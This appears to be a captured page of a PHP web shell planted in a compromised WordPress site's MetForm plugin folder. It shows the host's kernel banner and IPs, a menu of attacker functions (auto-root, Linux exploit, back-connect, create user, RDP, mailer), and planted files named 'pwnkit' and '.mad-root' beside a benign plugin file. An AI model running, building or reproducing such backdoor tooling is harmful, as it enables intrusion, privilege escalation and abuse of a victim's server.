Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
metform /
base /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
api.php
1.04
KB
-rw-r--r--
common.php
589
B
-rw-r--r--
cpt.php
390
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcode.php
7.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpt.php
<?php namespace MetForm\Base; defined( 'ABSPATH' ) || exit; abstract Class Cpt{ public function __construct() { $name = $this->get_name(); $args = $this->post_type(); add_action('init',function() use($name,$args) { register_post_type( $name, $args ); }); } public abstract function post_type(); }
Close